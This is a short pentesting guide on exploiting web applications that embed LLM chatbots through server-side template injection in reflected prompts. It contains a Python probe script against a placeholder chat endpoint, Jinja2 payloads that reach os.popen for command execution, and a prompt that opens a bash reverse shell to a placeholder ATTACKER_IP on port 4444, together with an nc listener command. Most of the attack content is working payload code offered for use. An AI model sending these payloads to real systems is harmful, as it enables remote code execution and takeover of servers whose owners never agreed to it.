
LLM Chatbot Pentesting

Last modified: 2025-03-12

An LLM chatbot embedded in a web application can be abused with several exploit techniques.

SSTI

If the chatbot reflects our prompt in its response and that response is rendered through a server-side template engine, we may be able to abuse it with server-side template injection (SSTI). For example:

Prompt: How are you? {{ 2*3 }}

Response: I will answer your question "How are you? 6". I'm good, thanks! How about you?
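As a sketch of how to automate this probe, the snippet below sends a few template-expression payloads to a hypothetical chat endpoint and flags any response where the expression appears to have been evaluated. The URL, JSON field name, and payload set are assumptions; adapt them to the target application and the template engines it might use.

import requests

# Hypothetical chat endpoint and message field; adjust to the target app.
CHAT_URL = "http://target.example/api/chat"

# Probe expressions for common template engines (Jinja2/Twig, ERB, etc.).
PAYLOADS = {
    "{{ 2*3 }}": "6",
    "${ 2*3 }": "6",
    "<%= 2*3 %>": "6",
}

for payload, expected in PAYLOADS.items():
    prompt = f"How are you? {payload}"
    resp = requests.post(CHAT_URL, json={"message": prompt}, timeout=30)
    body = resp.text
    # If the literal payload is gone but the evaluated result appears,
    # the reflected prompt is probably being rendered by a template engine.
    if payload not in body and expected in body:
        print(f"[+] Possible SSTI with payload: {payload}")
    else:
        print(f"[-] No evaluation for: {payload}")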

If the expression is evaluated (the response contains 6 instead of the literal {{ 2*3 }}), the application is likely vulnerable to SSTI, and we may be able to escalate to remote code execution and obtain a reverse shell.
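For instance, if the backend turns out to be Jinja2 with Flask globals exposed, a classic payload chain can reach os.popen for command execution. The attacker IP and port below are placeholders, and the exact object path depends on the application, so treat these prompts as examples to adapt rather than a guaranteed exploit:

Prompt: How are you? {{ cycler.__init__.__globals__.os.popen('id').read() }}

Prompt: How are you? {{ cycler.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"').read() }}

Start a listener (e.g. nc -lvnp 4444) on the attacker machine before sending the second prompt.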